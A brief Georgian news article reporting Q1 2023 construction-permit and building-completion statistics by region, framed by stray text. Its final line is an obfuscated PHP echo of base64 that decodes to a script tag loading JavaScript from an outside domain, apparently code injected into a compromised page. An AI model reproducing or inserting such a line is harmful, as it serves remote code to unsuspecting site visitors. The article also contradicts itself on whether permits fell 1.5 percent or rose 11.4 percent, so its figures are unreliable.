celsiusi
ავერსი შნაიდერი

სტატისტიკის ეროვნული სამსახურის ოფიციალური დეკლარირებული მონაცემებით, საქართველოში 2023 წლის იანვარ-მარტის პერიოდში გაცემულია 1.5 პროცენტით ნაკლები, 2 195 ნებართვა 1 689.9 ათასი კვ.მ ფართობის შენობა-ნაგებობების მშენებლობაზე. ეს მაჩვენებელი წინა წლის შესაბამის პერიოდთან შედარებით 11.4 პროცენტით მეტია.

ნებართვების 74.9 პროცენტი მოდის ქვეყნის 4 რეგიონზე, კერძოდ, 49.2 პროცენტი მოდის თბილისზე, 10.1 პროცენტი – მცხეთა-მთიანეთის რეგიონზე, 8.5 პროცენტი – ქვემო ქართლის რეგიონზე და 7.1 პროცენტი – იმერეთის რეგიონზე.

აღსანიშნავია, რომ 2023 წლის იანვარ-მარტში ნებართვები გაიცა მრავალფუნქციური საცხოვრებელი კომპლექსების, სავაჭრო ობიექტების, სასტუმროების, სამრეწველო საწარმოების, სასოფლო-სამეურნეო დანიშნულების ობიექტებისა და სხვა შენობა-ნაგებობების მშენებლობაზე.

ექსპლუატაციაში მიღებული ობიექტების რიცხვი კი 24.8 პროცენტით, 689-მდე გაიზარდა. ექსპლუატაციაში მიღებული ობიექტების ნახევარზე მეტი ასევე ქვეყნის 4 რეგიონზე მოდის, კერძოდ, 28.9 პროცენტი მოდის თბილისზე, 17.3 პროცენტი – მცხეთა-მთიანეთის რეგიონზე, 11.8 პროცენტი – კახეთის რეგიონზე და 9.9 პროცენტი – იმერეთის რეგიონზე. 

311
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");